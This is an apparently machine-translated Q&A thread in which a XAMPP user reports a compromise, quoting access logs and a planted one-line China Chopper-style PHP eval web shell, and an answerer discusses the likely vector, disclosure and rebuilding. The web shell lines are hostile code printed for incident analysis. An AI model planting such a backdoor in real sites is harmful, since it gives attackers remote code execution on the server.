dro*_*ooh 5 php mysql security xampp phpmyadmin
好的,所以我相信我遇到了包含phpmyadmin 4.7.4的最新版XAMPP(php 7.2.1)的安全问题.
我在我的htdocs文件夹wuwu11.php中发现了一个包含1行的文件,如下所示
<?php @eval($_POST[h])?>
我查看了访问日志,发现了以下内容
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin/ HTTP/1.1" 200 13732 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:04:59 -0600] "GET /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13640 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:01 -0600] "GET /index.php HTTP/1.1" 401 1297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /dashboard/phpinfo.php HTTP/1.1" 401 1309 "-" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /u.php?act=phpinfo HTTP/1.1" 401 1293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:05 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 9663 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
最后一行以php文件结束,该文件似乎通过phpmyadmin/import.php上传
在我的研究中,我发现这与中国Chopper Hacking Kit有关.这些访问日志中的IP映射到中国,福建,福州
在WordPress网站上找到<?php @eval($ _ POST ['pass']);?>代码
幸运的是我将我的根目录设置为xampp中默认的htdocs文件夹以外的其他内容,否则我猜测攻击者能够执行代码,做一些损坏然后自行删除
想知道是否有人已经看到这个或有更多的见解,好像我是正确的,并且攻击者正在利用phpmyadmin
为了彻底起见,我认为有必要指出,如果您怀疑任何软件程序存在安全问题,负责任的做法是直接私下向维护该软件的公司或团队报告。在这种情况下,phpMyAdmin 团队有一个关于如何通过电子邮件提交安全问题的网页。
接下来,phpMyAdmin 在其安全页面上发布安全公告,我没有看到任何允许上传任意文件的内容,特别是没有任何影响您的版本的内容。我认为 phpMyAdmin 不太可能是这里的攻击媒介。有趣的是,攻击者试图向导入和导出页面提交数据,但无论是否成功登录,都会记录状态码200,因此我们无法从这部分日志判断他们是否登录。能够在这里做任何事情。与发布令牌的登录请求相同;如果它不是主动有效的令牌,则登录尝试将被拒绝,并且 HTTP 状态代码无论如何都是 200。他们还尝试了其他几个文件,包括 u.php 和一个名为“dashboard”的子目录,这似乎是试图利用几个可能的漏洞中的任何一个。
根据已发布的信息,我们无法判断攻击者使用什么向量来上传初始文件。然而,您已经受到威胁,需要清理、保护攻击向量并进行重建。我建议彻底重建,因为你不知道他们还做出了哪些妥协。